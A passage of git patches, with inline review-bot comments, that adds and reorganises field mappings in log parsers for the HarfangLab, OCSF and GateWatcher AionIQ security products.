 HarfangLab/harfanglab/_meta/fields.yml | 40 +++++++++++++++++++
 HarfangLab/harfanglab/ingest/parser.yml | 16 +++++++---
 2 files changed, 52 insertions(+), 4 deletions(-)
diff --git a/HarfangLab/harfanglab/_meta/fields.yml b/HarfangLab/harfanglab/_meta/fields.yml
index aded5e2de..e57a69bca 100644
--- a/HarfangLab/harfanglab/_meta/fields.yml
+++ b/HarfangLab/harfanglab/_meta/fields.yml
@@ -88,6 +88,21 @@ action.properties.CategoryName:
 name: action.properties.CategoryName
 type: keyword
+action.properties.CertIssuerName:
+ description: ''
+ name: action.properties.CertIssuerName
+ type: keyword
+
+action.properties.CertSerialNumber:
+ description: ''
+ name: action.properties.CertSerialNumber
+ type: keyword
+
+action.properties.CertThumbprint:
+ description: ''
+ name: action.properties.CertThumbprint
+ type: keyword
+
 action.properties.ClientProcessId:
 description: ''
 name: action.properties.ClientProcessId
@@ -393,6 +408,11 @@ action.properties.PostCleanStatus:
 name: action.properties.PostCleanStatus
 type: keyword
+action.properties.PreAuthType:
+ description: ''
+ name: action.properties.PreAuthType
+ type: keyword
+
 action.properties.PreExecutionStatus:
 description: ''
 name: action.properties.PreExecutionStatus
@@ -518,6 +538,16 @@ action.properties.SecurityintelligenceVersion:
 name: action.properties.SecurityintelligenceVersion
 type: keyword
+action.properties.ServiceName:
+ description: ''
+ name: action.properties.ServiceName
+ type: keyword
+
+action.properties.ServiceSid:
+ description: ''
+ name: action.properties.ServiceSid
+ type: keyword
+
 action.properties.SeverityID:
 description: ''
 name: action.properties.SeverityID
@@ -688,6 +718,16 @@ action.properties.ThreatName:
 name: action.properties.ThreatName
 type: keyword
+action.properties.TicketEncryptionType:
+ description: ''
+ name: action.properties.TicketEncryptionType
+ type: keyword
+
+action.properties.TicketOptions:
+ description: ''
+ name: action.properties.TicketOptions
+ type: keyword
+
 action.properties.TotalSignatureCount:
 description: ''
 name: action.properties.TotalSignatureCount
diff --git a/HarfangLab/harfanglab/ingest/parser.yml b/HarfangLab/harfanglab/ingest/parser.yml
index 8a357b33f..df5369509 100644
--- a/HarfangLab/harfanglab/ingest/parser.yml
+++ b/HarfangLab/harfanglab/ingest/parser.yml
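Review bot: All ten new `action.properties.*` entries, across the four hunks of this file, are declared with `description: ''`, which matches the surrounding entries but leaves fields such as `TicketOptions` or `PreAuthType` undocumented for the analysts who will query them. The names `PreAuthType`, `ServiceName`, `ServiceSid`, `TicketEncryptionType`, `TicketOptions` and the three `Cert*` fields look like Windows Security event data for Kerberos ticket requests and certificate-based logons (to be confirmed against the source events); one line each, e.g. `description: Kerberos pre-authentication type reported in the ticket request event`, would record that and make the taxonomy searchable by meaning rather than by raw name.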
@@ -292,6 +292,9 @@ stages:
 action.properties.CallerProcessName: "{{json_event.message.event_data.get('CallerProcessName')}}"
 action.properties.CategoryID: "{{json_event.message.event_data.get('Category ID')}}"
 action.properties.CategoryName: "{{json_event.message.event_data.get('Category Name')}}"
+ action.properties.CertIssuerName: "{{json_event.message.event_data.get('CertIssuerName')}}"
+ action.properties.CertSerialNumber: "{{json_event.message.event_data.get('CertSerialNumber')}}"
+ action.properties.CertThumbprint: "{{json_event.message.event_data.get('CertThumbprint')}}"
 action.properties.ClientProcessId: "{{json_event.message.event_data.get('ClientProcessId')}}"
 action.properties.ClientProcessStartKey: "{{json_event.message.event_data.get('ClientProcessStartKey')}}"
 action.properties.DetectionID: "{{json_event.message.event_data.get('Detection ID')}}"
@@ -353,9 +356,10 @@ stages:
 action.properties.Platformversion: "{{json_event.message.event_data.get('Platform version')}}"
 action.properties.PolicyBits: "{{json_event.message.event_data.get('PolicyBits')}}"
 action.properties.PostCleanStatus: "{{json_event.message.event_data.get('Post Clean Status')}}"
+ action.properties.PreAuthType: "{{json_event.message.event_data.get('PreAuthType')}}"
 action.properties.PreExecutionStatus: "{{json_event.message.event_data.get('Pre Execution Status')}}"
- action.properties.ProcessName: "{{json_event.message.event_data.get('Process Name') or json_event.message.event_data.get('ProcessName')}}"
 action.properties.ProcessId: "{{json_event.message.event_data.get('ProcessId')}}"
+ action.properties.ProcessName: "{{json_event.message.event_data.get('Process Name') or json_event.message.event_data.get('ProcessName')}}"
 action.properties.ProcessNameBuffer: "{{json_event.message.event_data.get('ProcessNameBuffer')}}"
 action.properties.ProcessNameLength: "{{json_event.message.event_data.get('ProcessNameLength')}}"
 action.properties.ProductName: "{{json_event.message.event_data.get('Product Name')}}"
@@ -378,6 +382,8 @@ stages:
 action.properties.ScriptBlockText: "{{json_event.message.event_data.get('ScriptBlockText')}}"
 action.properties.SecureRequired: "{{json_event.message.event_data.get('SecureRequired')}}"
 action.properties.SecurityintelligenceVersion: "{{json_event.message.event_data.get('Security intelligence Version')}}"
+ action.properties.ServiceName: "{{json_event.message.event_data.get('ServiceName')}}"
+ action.properties.ServiceSid: "{{json_event.message.event_data.get('ServiceSid')}}"
 action.properties.SeverityID: "{{json_event.message.event_data.get('Severity ID')}}"
 action.properties.SeverityName: "{{json_event.message.event_data.get('Severity Name')}}"
 action.properties.ShareLocalPath: "{{json_event.message.event_data.get('ShareLocalPath')}}"
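Review bot: Besides the new `PreAuthType`, `ServiceName` and `ServiceSid` mappings, this hunk and the two that follow (@@ -410 and @@ -437) move `ProcessName`, `Unused`, `param1` and `param2` to new positions without altering them, and the resulting order is neither the previous one nor plain lexical (`param1` now follows `param19`, `Unused` follows `Unused6`). The order has no effect on a YAML mapping, so if a formatter dictates it, a note in the commit message or a separate formatting commit would keep this diff to the taxonomy additions its subject describes and make the functional change easier to audit.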
@@ -410,23 +416,24 @@ stages:
 action.properties.TaskName: "{{json_event.message.event_data.get('TaskName')}}"
 action.properties.ThreatID: "{{json_event.message.event_data.get('Threat ID')}}"
 action.properties.ThreatName: "{{json_event.message.event_data.get('Threat Name')}}"
+ action.properties.TicketEncryptionType: "{{json_event.message.event_data.get('TicketEncryptionType')}}"
+ action.properties.TicketOptions: "{{json_event.message.event_data.get('TicketOptions')}}"
 action.properties.TotalSignatureCount: "{{json_event.message.event_data.get('TotalSignatureCount')}}"
 action.properties.TransmittedServices: "{{json_event.message.event_data.get('TransmittedServices')}}"
 action.properties.TypeID: "{{json_event.message.event_data.get('Type ID')}}"
 action.properties.TypeName: "{{json_event.message.event_data.get('Type Name')}}"
- action.properties.Unused: "{{json_event.message.event_data.get('Unused')}}"
 action.properties.Unused2: "{{json_event.message.event_data.get('Unused2')}}"
 action.properties.Unused3: "{{json_event.message.event_data.get('Unused3')}}"
 action.properties.Unused4: "{{json_event.message.event_data.get('Unused4')}}"
 action.properties.Unused5: "{{json_event.message.event_data.get('Unused5')}}"
 action.properties.Unused6: "{{json_event.message.event_data.get('Unused6')}}"
+ action.properties.Unused: "{{json_event.message.event_data.get('Unused')}}"
 action.properties.ValidatedPolicy: "{{json_event.message.event_data.get('ValidatedPolicy')}}"
 action.properties.ValidatedSigningLevel: "{{json_event.message.event_data.get('ValidatedSigningLevel')}}"
 action.properties.VerificationError: "{{json_event.message.event_data.get('VerificationError')}}"
 action.properties.VirtualAccount: "{{json_event.message.event_data.get('VirtualAccount')}}"
 action.properties.WorkstationName: "{{json_event.message.event_data.get('WorkstationName')}}"
 action.properties.param0: "{{json_event.message.event_data.get('param0')}}"
- action.properties.param1: "{{json_event.message.event_data.get('param1')}}"
 action.properties.param10: "{{json_event.message.event_data.get('param10')}}"
 action.properties.param11: "{{json_event.message.event_data.get('param11')}}"
 action.properties.param12: "{{json_event.message.event_data.get('param12')}}"
@@ -437,10 +444,11 @@ stages:
 action.properties.param17: "{{json_event.message.event_data.get('param17')}}"
 action.properties.param18: "{{json_event.message.event_data.get('param18')}}"
 action.properties.param19: "{{json_event.message.event_data.get('param19')}}"
- action.properties.param2: "{{json_event.message.event_data.get('param2')}}"
+ action.properties.param1: "{{json_event.message.event_data.get('param1')}}"
 action.properties.param20: "{{json_event.message.event_data.get('param20')}}"
 action.properties.param21: "{{json_event.message.event_data.get('param21')}}"
 action.properties.param22: "{{json_event.message.event_data.get('param22')}}"
+ action.properties.param2: "{{json_event.message.event_data.get('param2')}}"
 action.properties.param3: "{{json_event.message.event_data.get('param3')}}"
 action.properties.param4: "{{json_event.message.event_data.get('param4')}}"
 action.properties.param5: "{{json_event.message.event_data.get('param5')}}"
From 56643bd300f8846842694f0f59f3af8ad1e8237d Mon Sep 17 00:00:00 2001
From: Sebastien Quioc
Date: Fri, 20 Sep 2024 10:48:09 +0200
Subject: [PATCH 063/317] fix(OCSF): add automation connector information
---
 OCSF/ocsf/_meta/manifest.yml | 2 ++
 1 file changed, 2 insertions(+)
diff --git a/OCSF/ocsf/_meta/manifest.yml b/OCSF/ocsf/_meta/manifest.yml
index 931c78599..b962f6e78 100644
--- a/OCSF/ocsf/_meta/manifest.yml
+++ b/OCSF/ocsf/_meta/manifest.yml
@@ -1,4 +1,6 @@
 uuid: a9c959ac-78ec-47a4-924e-8156a77cebf5
+automation_connector_uuid: 04c40271-b44e-4977-8c62-5356011b2bb6
+automation_module_uuid: b4462429-6f0f-42b5-87b8-430111697d28
 name: OCSF
 slug: ocsf
From d4cd82be3487d9eeec38c70ca86d72bce2422a16 Mon Sep 17 00:00:00 2001
From: Sebastien Quioc Date: Tue, 17 Sep 2024 11:07:49 +0200 Subject: [PATCH 064/317] fix(GateWatcher): fix the identifier of the format --- GateWatcher/aioniq/_meta/manifest.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/GateWatcher/aioniq/_meta/manifest.yml b/GateWatcher/aioniq/_meta/manifest.yml index a540d5536..ca91ad93d 100644 --- a/GateWatcher/aioniq/_meta/manifest.yml +++ b/GateWatcher/aioniq/_meta/manifest.yml @@ -1,4 +1,4 @@ -uuid: 0825709a-5f76-441e-9dfb-2b5ea6ce551c +uuid: bba2bed2-d925-440f-a0ce-dbcae04eaf26 name: Gatewatcher AionIQ slug: aioniq From 33d3ae72e888526ee9876b6da1a47efaef7c2db4 Mon Sep 17 00:00:00 2001 From: Sebastien Quioc Date: Tue, 17 Sep 2024 11:08:16 +0200 Subject: [PATCH 065/317] chore(GateWatcher): add the version for the format --- GateWatcher/aioniq/_meta/manifest.yml | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/GateWatcher/aioniq/_meta/manifest.yml b/GateWatcher/aioniq/_meta/manifest.yml index ca91ad93d..010f47f7e 100644 --- a/GateWatcher/aioniq/_meta/manifest.yml +++ b/GateWatcher/aioniq/_meta/manifest.yml @@ -1,9 +1,10 @@ uuid: bba2bed2-d925-440f-a0ce-dbcae04eaf26 -name: Gatewatcher AionIQ +name: Gatewatcher AionIQ v102 slug: aioniq description: >- A new detection and response platform (NDR) that enables to identify with certainty malicious actions and suspicious behaviors based on a mapping of all assets present on the information system. + This format parses events up to the version 102. data_sources: Network intrusion detection system: AIONIQ identify suspicious behaviors From 4799d26c0a8075963ac59c25bfe14842a97e2b79 Mon Sep 17 00:00:00 2001 From: Sebastien Quioc Date: Tue, 17 Sep 2024 11:08:40 +0200 Subject: [PATCH 066/317] chore(GateWatcher): clean up the parser --- GateWatcher/aioniq/ingest/parser.yml | 41 ---------------------------- 1 file changed, 41 deletions(-) 
diff --git a/GateWatcher/aioniq/ingest/parser.yml b/GateWatcher/aioniq/ingest/parser.yml index 162cc5093..49a30a7da 100644 --- a/GateWatcher/aioniq/ingest/parser.yml +++ b/GateWatcher/aioniq/ingest/parser.yml @@ -1,17 +1,12 @@ name: gatewatcher-aioniq-legacy-format -ignored_values: null pipeline: - name: json_load - description: '' - filter: '' external: name: json.parse-json properties: input_field: '{{original.message}}' output_field: message - name: parsed_date - description: '' - filter: '' external: name: date.parse properties: @@ -20,48 +15,29 @@ pipeline: format: null timezone: UTC - name: common - description: '' - filter: '' - external: null - name: malcore - description: '' filter: '{{json_load.message.type == "malcore"}}' - external: null - name: suricata - description: '' filter: '{{json_load.message.type == "suricata"}}' - external: null - name: powershell description: powershell - filter: '' - external: null - name: shellcode description: shellcode - filter: '' - external: null - name: fileinfo description: fileinfo - filter: '' - external: null - name: dga description: DGA - filter: '' - external: null - name: retrohunt description: Retrohunt - filter: '' - external: null stages: common: actions: - set: source.ip: '{{json_load.message.src_ip}}' filter: '{{json_load.message.src_ip | is_ipaddress}}' - name: set - set: destination.ip: '{{json_load.message.dest_ip}}' filter: '{{json_load.message.dest_ip | is_ipaddress}}' - name: set - set: '@timestamp': '{{parsed_date.datetime}}' source.port: '{{json_load.message.src_port}}' 
@@ -86,14 +62,11 @@ stages: gatewatcher.payload_printable: '{{json_load.message.payload_printable}}' gatewatcher.timestamp_analyzed: '{{json_load.message.timestamp_analyzed}}' gatewatcher.timestamp_detected: '{{json_load.message.timestamp_detected}}' - filter: '' - name: set - set: observer.mac: >- ["{{json_load.message.ether.src_mac}}", "{{json_load.message.ether.dest_mac}}"] filter: '{{json_load.message.ether != null}}' - name: set malcore: actions: - set: @@ -120,8 +93,6 @@ stages: gatewatcher.malcore.replica: '{{json_load.message.replica}}' gatewatcher.reporting_token: '{{json_load.message.reporting_token}}' gatewatcher.malcore.detail_threat_found: '{{json_load.message.detail_threat_found}}' - filter: '' - name: set suricata: actions: - set: @@ -170,8 +141,6 @@ stages: gatewatcher.ftp_data: '{{json_load.message.ftp_data}}' gatewatcher.email: '{{json_load.message.email}}' http.response.status_code: '{{json_load.message.http.status}}' - filter: '' - name: set powershell: actions: - set: @@ -180,8 +149,6 @@ stages: gatewatcher.scores.analysis: '{{json_load.message.scores.analysis}}' gatewatcher.scores.proba_obfuscated: '{{json_load.message.scores.proba_obfuscated}}' gatewatcher.scores.analysis_detailed: '{{json_load.message.scores.analysis_detailed}}' - filter: '' - name: set shellcode: actions: - set: @@ -190,14 +157,10 @@ stages: gatewatcher.encodings: '{{json_load.message.encodings}}' gatewatcher.sample_id: '{{json_load.message.sample_id}}' gatewatcher.sub_type: '{{json_load.message.sub_type}}' - filter: '' - name: set fileinfo: actions: - set: gatewatcher.filemagic: '{{json_load.message.fileinfo.magic}}' - filter: '' - name: set dga: actions: - set: @@ -205,8 +168,6 @@ stages: gatewatcher.domain_name: '{{json_load.message.domain_name}}' gatewatcher.probability: '{{json_load.message.probability}}' gatewatcher.matched_event: '{{json_load.message.matched_event}}' - filter: '' - name: set retrohunt: actions: - set: 
@@ -240,5 +201,3 @@ stages: gatewatcher.targeted_countries: '{{json_load.message.targeted_countries}}' gatewatcher.targeted_platforms: '{{json_load.message.targeted_platforms}}' gatewatcher.targeted_organizations: '{{json_load.message.targeted_organizations}}' - filter: '' - name: set From fb4e7a9bff031ff428124719122670fad2742149 Mon Sep 17 00:00:00 2001 From: Sebastien Quioc Date: Tue, 17 Sep 2024 11:14:25 +0200 Subject: [PATCH 067/317] fix(GateWatcher): apply linter --- GateWatcher/aioniq/_meta/fields.yml | 187 +++++++------- GateWatcher/aioniq/ingest/parser.yml | 270 ++++++++++---------- GateWatcher/aioniq/tests/codebreaker.json | 4 +- GateWatcher/aioniq/tests/dga.json | 4 +- GateWatcher/aioniq/tests/malcore.json | 4 +- GateWatcher/aioniq/tests/retrohunt.json | 4 +- GateWatcher/aioniq/tests/sigflow-alert.json | 4 +- GateWatcher/aioniq/tests/sigflow-file.json | 4 +- GateWatcher/aioniq/tests/sigflow-meta.json | 4 +- 9 files changed, 237 insertions(+), 248 deletions(-) diff --git a/GateWatcher/aioniq/_meta/fields.yml b/GateWatcher/aioniq/_meta/fields.yml index 5bdc4fb3e..01ffdaf05 100644 --- a/GateWatcher/aioniq/_meta/fields.yml +++ b/GateWatcher/aioniq/_meta/fields.yml 
@@ -1,83 +1,3 @@ -gatewatcher.event_type: - description: Type of event - name: gatewatcher.event_type - type: keyword - -gatewatcher.flow_id: - description: Identifier of the flow - name: gatewatcher.flow_id - type: keyword - -gatewatcher.gcap: - description: Name of the gcap - name: gatewatcher.gcap - type: keyword - -gatewatcher.gcenter: - description: Name of the associated gcenter - name: gatewatcher.gcenter - type: keyword - -gatewatcher.malcore.code: - description: Return code of the malcore analysis - name: gatewatcher.malcore.code - type: number - -gatewatcher.malcore.detail_threat_found: - description: Type of the detected threat - name: gatewatcher.malcore.detail_threat_found - type: keyword - -gatewatcher.malcore.file: - description: Identifier of the file - name: gatewatcher.malcore.file - type: keyword - -gatewatcher.malcore.magic: - description: The magic number of the executable of the malware - name: gatewatcher.malcore.magic - type: keyword - -gatewatcher.malcore.replica: - description: Analysis is a replica of another previous one - name: gatewatcher.malcore.replica - type: keyword - -gatewatcher.nb_rescans: - description: Number of retroact analysis - name: gatewatcher.nb_rescans - type: long - -gatewatcher.reporting_token: - description: Token used by Gbox - name: gatewatcher.reporting_token - type: keyword - -gatewatcher.retroact: - description: Analysis result per retroact - name: gatewatcher.retroact - type: keyword - -gatewatcher.state: - description: Analysis result - name: gatewatcher.state - type: keyword - -gatewatcher.timestamp_analyzed: - description: Timestamp of the alert processing by gcenter - name: gatewatcher.timestamp_analyzed - type: keyword - -gatewatcher.timestamp_detected: - description: Timestamp of the file collection by gcap - name: gatewatcher.timestamp_detected - type: keyword - -gatewatcher.type: - description: Type of analysis - name: gatewatcher.type - type: keyword - gatewatcher.calls: description: This field 
represents the list of calls detected in a shellcode name: gatewatcher.calls @@ -120,11 +40,21 @@ gatewatcher.domain_name: name: gatewatcher.domain_name type: text +gatewatcher.email: + description: This field represents the email field + name: gatewatcher.email + type: text + gatewatcher.encodings: description: This field represents the encodings used in the shellcode name: gatewatcher.encodings type: text +gatewatcher.event_type: + description: Type of event + name: gatewatcher.event_type + type: keyword + gatewatcher.external_links: description: This field is used for retrohunt alerts name: gatewatcher.external_links @@ -146,6 +76,11 @@ gatewatcher.filemagic: name: gatewatcher.filemagic type: text +gatewatcher.flow_id: + description: Identifier of the flow + name: gatewatcher.flow_id + type: keyword + gatewatcher.ftp: description: This field represents the ftp field in a network metadata (used in legacy format log) @@ -158,6 +93,16 @@ gatewatcher.ftp_data: name: gatewatcher.ftp_data type: text +gatewatcher.gcap: + description: Name of the gcap + name: gatewatcher.gcap + type: keyword + +gatewatcher.gcenter: + description: Name of the associated gcenter + name: gatewatcher.gcenter + type: keyword + gatewatcher.http2: description: This field represents the http2 field in a network metadata (used in legacy format log) 
@@ -211,6 +156,31 @@ gatewatcher.krb5: name: gatewatcher.krb5 type: text +gatewatcher.malcore.code: + description: Return code of the malcore analysis + name: gatewatcher.malcore.code + type: number + +gatewatcher.malcore.detail_threat_found: + description: Type of the detected threat + name: gatewatcher.malcore.detail_threat_found + type: keyword + +gatewatcher.malcore.file: + description: Identifier of the file + name: gatewatcher.malcore.file + type: keyword + +gatewatcher.malcore.magic: + description: The magic number of the executable of the malware + name: gatewatcher.malcore.magic + type: keyword + +gatewatcher.malcore.replica: + description: Analysis is a replica of another previous one + name: gatewatcher.malcore.replica + type: keyword + gatewatcher.matched_event: description: This field represents the matched event found in a dga and retrohunt alert @@ -233,6 +203,11 @@ gatewatcher.mqtt: name: gatewatcher.mqtt type: text +gatewatcher.nb_rescans: + description: Number of retroact analysis + name: gatewatcher.nb_rescans + type: long + gatewatcher.nfs: description: This field represents the nfs field in a network metadata (used in legacy format log) @@ -266,6 +241,16 @@ gatewatcher.relations: name: gatewatcher.relations type: text +gatewatcher.reporting_token: + description: Token used by Gbox + name: gatewatcher.reporting_token + type: keyword + +gatewatcher.retroact: + description: Analysis result per retroact + name: gatewatcher.retroact + type: keyword + gatewatcher.rfb: description: This field represents the rfb field in a network metadata (used in legacy format log) @@ -320,11 +305,6 @@ gatewatcher.smb: name: gatewatcher.smb type: text -gatewatcher.email: - description: This field represents the email field - name: gatewatcher.email - type: text - gatewatcher.smtp: description: This field represents the smtp field in a network metadata (used in legacy format log) 
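Review bot: `gatewatcher.malcore.code` is re-added here with `type: number`, but the parser hunk in this same diff emits it as `gatewatcher.malcore.code: "{{json_load.message.code|string}}"`, so the declared type and the rendered value disagree. Whether the intake coerces that string back to a number is not visible here; if it does not, numeric range queries on the return code will not behave the way the schema suggests. Either declare the field as `type: keyword` to match what is emitted, or drop the `|string` filter in the parser, and change the two together. The other definitions in this hunk are unchanged moves.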
@@ -343,6 +323,11 @@ gatewatcher.ssh: name: gatewatcher.ssh type: text +gatewatcher.state: + description: Analysis result + name: gatewatcher.state + type: keyword + gatewatcher.stats: description: This field represents the metrics stats name: gatewatcher.stats @@ -373,19 +358,10 @@ gatewatcher.targeted_sectors: name: gatewatcher.targeted_sectors type: text -gatewatcher.tftp.file: - description: tftp file field - name: gatewatcher.tftp.file - type: text - -gatewatcher.tftp.mode: - description: tftp mode field - name: gatewatcher.tftp.mode - type: text - -gatewatcher.tftp.packet: - description: tftp packet field - name: gatewatcher.tftp.packet +gatewatcher.tftp: + description: This field represents the tftp field in a network metadata (used in + legacy format log) + name: gatewatcher.tftp type: text gatewatcher.threat_actor: @@ -393,6 +369,16 @@ gatewatcher.threat_actor: name: gatewatcher.threat_actor type: text +gatewatcher.timestamp_analyzed: + description: Timestamp of the alert processing by gcenter + name: gatewatcher.timestamp_analyzed + type: keyword + +gatewatcher.timestamp_detected: + description: Timestamp of the file collection by gcap + name: gatewatcher.timestamp_detected + type: keyword + gatewatcher.timestamp_package: description: This field is used for retrohunt alerts name: gatewatcher.timestamp_package @@ -414,6 +400,11 @@ gatewatcher.ttp: name: gatewatcher.ttp type: text +gatewatcher.type: + description: Type of analysis + name: gatewatcher.type + type: keyword + gatewatcher.usage_mode: description: This field is used for retrohunt alerts name: gatewatcher.usage_mode diff --git a/GateWatcher/aioniq/ingest/parser.yml b/GateWatcher/aioniq/ingest/parser.yml index 49a30a7da..93f390a79 100644 --- a/GateWatcher/aioniq/ingest/parser.yml +++ b/GateWatcher/aioniq/ingest/parser.yml 
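Review bot: Removing `gatewatcher.tftp.file`, `gatewatcher.tftp.mode` and `gatewatcher.tftp.packet` in favour of a single `gatewatcher.tftp` of `type: text` is a breaking schema change for any saved search or detection rule that references the dotted sub-fields; the parser hunk in this diff makes the matching mapping change. Storing the whole `tftp` object in a `text` field also loses the per-attribute searchability (file name, transfer mode) that the old fields gave, which is what an analyst filters on when triaging a TFTP transfer. If the consolidation is intended for consistency with the other protocol fields, it should at least be called out as a field removal in the changelog, and keeping the three sub-fields alongside `gatewatcher.tftp` for a deprecation period would avoid silently breaking existing content.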
@@ -4,13 +4,13 @@ pipeline: external: name: json.parse-json properties: - input_field: '{{original.message}}' + input_field: "{{original.message}}" output_field: message - name: parsed_date external: name: date.parse properties: - input_field: '{{json_load.message.timestamp_analyzed}}' + input_field: "{{json_load.message.timestamp_analyzed}}" output_field: datetime format: null timezone: UTC 
@@ -33,171 +33,169 @@ stages: common: actions: - set: - source.ip: '{{json_load.message.src_ip}}' - filter: '{{json_load.message.src_ip | is_ipaddress}}' + source.ip: "{{json_load.message.src_ip}}" + filter: "{{json_load.message.src_ip | is_ipaddress}}" - set: - destination.ip: '{{json_load.message.dest_ip}}' - filter: '{{json_load.message.dest_ip | is_ipaddress}}' + destination.ip: "{{json_load.message.dest_ip}}" + filter: "{{json_load.message.dest_ip | is_ipaddress}}" - set: - '@timestamp': '{{parsed_date.datetime}}' - source.port: '{{json_load.message.src_port}}' - observer.name: '{{json_load.message.gcap}}' + "@timestamp": "{{parsed_date.datetime}}" + source.port: "{{json_load.message.src_port}}" + observer.name: "{{json_load.message.gcap}}" observer.type: ids event.category: - network - event.severity: '{{json_load.message.severity}}' - destination.port: '{{json_load.message.dest_port}}' - gatewatcher.gcap: '{{json_load.message.gcap}}' - gatewatcher.type: '{{json_load.message.type}}' - network.protocol: '{{json_load.message.app_proto}}' - observer.version: '0.2' - gatewatcher.state: '{{json_load.message.state}}' - gatewatcher.stats: '{{json_load.message.stats}}' - network.transport: '{{json_load.message.proto}}' - observer.hostname: '{{json_load.message.host}}' - gatewatcher.flow_id: '{{json_load.message.flow_id}}' - gatewatcher.gcenter: '{{json_load.message.gcenter}}' - gatewatcher.payload: '{{json_load.message.payload}}' - gatewatcher.event_type: '{{json_load.message.event_type}}' - gatewatcher.payload_printable: '{{json_load.message.payload_printable}}' - gatewatcher.timestamp_analyzed: '{{json_load.message.timestamp_analyzed}}' - gatewatcher.timestamp_detected: '{{json_load.message.timestamp_detected}}' + event.severity: "{{json_load.message.severity}}" + destination.port: "{{json_load.message.dest_port}}" + gatewatcher.gcap: "{{json_load.message.gcap}}" + gatewatcher.type: "{{json_load.message.type}}" + network.protocol: "{{json_load.message.app_proto}}" 
+ observer.version: "0.2" + gatewatcher.state: "{{json_load.message.state}}" + gatewatcher.stats: "{{json_load.message.stats}}" + network.transport: "{{json_load.message.proto}}" + observer.hostname: "{{json_load.message.host}}" + gatewatcher.flow_id: "{{json_load.message.flow_id}}" + gatewatcher.gcenter: "{{json_load.message.gcenter}}" + gatewatcher.payload: "{{json_load.message.payload}}" + gatewatcher.event_type: "{{json_load.message.event_type}}" + gatewatcher.payload_printable: "{{json_load.message.payload_printable}}" + gatewatcher.timestamp_analyzed: "{{json_load.message.timestamp_analyzed}}" + gatewatcher.timestamp_detected: "{{json_load.message.timestamp_detected}}" - set: observer.mac: >- ["{{json_load.message.ether.src_mac}}", "{{json_load.message.ether.dest_mac}}"] - filter: '{{json_load.message.ether != null}}' + filter: "{{json_load.message.ether != null}}" malcore: actions: - set: - url.path: '{{json_load.message.http.url}}' - file.name: '{{json_load.message.fileinfo.filename}}' - file.size: '{{json_load.message.fileinfo.size}}' + url.path: "{{json_load.message.http.url}}" + file.name: "{{json_load.message.fileinfo.filename}}" + file.size: "{{json_load.message.fileinfo.size}}" event.type: - info - url.domain: '{{json_load.message.http.hostname}}' - http.version: '{{json_load.message.http.version}}' - file.hash.md5: '{{json_load.message.fileinfo.md5}}' + url.domain: "{{json_load.message.http.hostname}}" + http.version: "{{json_load.message.http.version}}" + file.hash.md5: "{{json_load.message.fileinfo.md5}}" event.category: - malware - file.hash.sha256: '{{json_load.message.fileinfo.sha256}}' - http.request.method: '{{json_load.message.http.http_method}}' - user_agent.original: '{{json_load.message.http.http_user_agent}}' - gatewatcher.fileinfo: '{{json_load.message.fileinfo}}' - gatewatcher.retroact: '{{json_load.message.retroact}}' - gatewatcher.nb_rescans: '{{json_load.message.nb_rescans}}' - gatewatcher.malcore.code: 
'{{json_load.message.code|string}}' - gatewatcher.malcore.file: '{{json_load.message.file}}' - gatewatcher.malcore.magic: '{{json_load.message.magic}}' - http.response.status_code: '{{json_load.message.http.status}}' - gatewatcher.malcore.replica: '{{json_load.message.replica}}' - gatewatcher.reporting_token: '{{json_load.message.reporting_token}}' - gatewatcher.malcore.detail_threat_found: '{{json_load.message.detail_threat_found}}' + file.hash.sha256: "{{json_load.message.fileinfo.sha256}}" + http.request.method: "{{json_load.message.http.http_method}}" + user_agent.original: "{{json_load.message.http.http_user_agent}}" + gatewatcher.fileinfo: "{{json_load.message.fileinfo}}" + gatewatcher.retroact: "{{json_load.message.retroact}}" + gatewatcher.nb_rescans: "{{json_load.message.nb_rescans}}" + gatewatcher.malcore.code: "{{json_load.message.code|string}}" + gatewatcher.malcore.file: "{{json_load.message.file}}" + gatewatcher.malcore.magic: "{{json_load.message.magic}}" + http.response.status_code: "{{json_load.message.http.status}}" + gatewatcher.malcore.replica: "{{json_load.message.replica}}" + gatewatcher.reporting_token: "{{json_load.message.reporting_token}}" + gatewatcher.malcore.detail_threat_found: "{{json_load.message.detail_threat_found}}" suricata: actions: - set: - dns.id: '{{json_load.message.dns.id}}' - rule.id: '{{json_load.message.alert.signature_id|string}}' - dns.type: '{{json_load.message.dns.type}}' - url.path: '{{json_load.message.http.url}}' - file.name: '{{json_load.message.fileinfo.filename}}' - file.size: '{{json_load.message.fileinfo.size}}' - rule.name: '{{json_load.message.alert.signature}}' - url.domain: '{{json_load.message.http.hostname}}' - event.action: '{{json_load.message.alert.action}}' - http.version: '{{json_load.message.http.version}}' - rule.version: '{{json_load.message.alert.rule.version}}' - source.bytes: '{{json_load.message.flow.bytes_toserver}}' - file.hash.md5: '{{json_load.message.fileinfo.md5}}' - rule.category: 
'{{json_load.message.alert.category}}' - source.packets: '{{json_load.message.flow.pkts_toserver}}' - gatewatcher.ftp: '{{json_load.message.ftp}}' - gatewatcher.nfs: '{{json_load.message.nfs}}' - gatewatcher.rdp: '{{json_load.message.rdp}}' - gatewatcher.rfb: '{{json_load.message.rfb}}' - gatewatcher.rpc: '{{json_load.message.rpc}}' - gatewatcher.sip: '{{json_load.message.sip}}' - gatewatcher.smb: '{{json_load.message.smb}}' - gatewatcher.ssh: '{{json_load.message.ssh}}' - gatewatcher.tls: '{{json_load.message.tls}}' - file.hash.sha256: '{{json_load.message.fileinfo.sha256}}' - gatewatcher.dhcp: '{{json_load.message.dhcp}}' - gatewatcher.dnp3: '{{json_load.message.dnp3}}' - gatewatcher.krb5: '{{json_load.message.krb5}}' - gatewatcher.mqtt: '{{json_load.message.mqtt}}' - gatewatcher.smtp: '{{json_load.message.smtp}}' - gatewatcher.snmp: '{{json_load.message.snmp}}' - gatewatcher.tftp.file: '{{json_load.message.tftp.file}}' - gatewatcher.tftp.mode: '{{json_load.message.tftp.mode}}' - gatewatcher.tftp.packet: '{{json_load.message.tftp.packet}}' - destination.bytes: '{{json_load.message.flow.bytes_toclient}}' - dns.question.name: '{{json_load.message.dns.rrname}}' - dns.question.type: '{{json_load.message.dns.rrtype}}' - gatewatcher.http2: '{{json_load.message.http.http2}}' - gatewatcher.ikev2: '{{json_load.message.ikev2}}' - destination.packets: '{{json_load.message.flow.pkts_toclient}}' - http.request.method: '{{json_load.message.http.http_method}}' - user_agent.original: '{{json_load.message.http.http_user_agent}}' - gatewatcher.ftp_data: '{{json_load.message.ftp_data}}' - gatewatcher.email: '{{json_load.message.email}}' - http.response.status_code: '{{json_load.message.http.status}}' + dns.id: 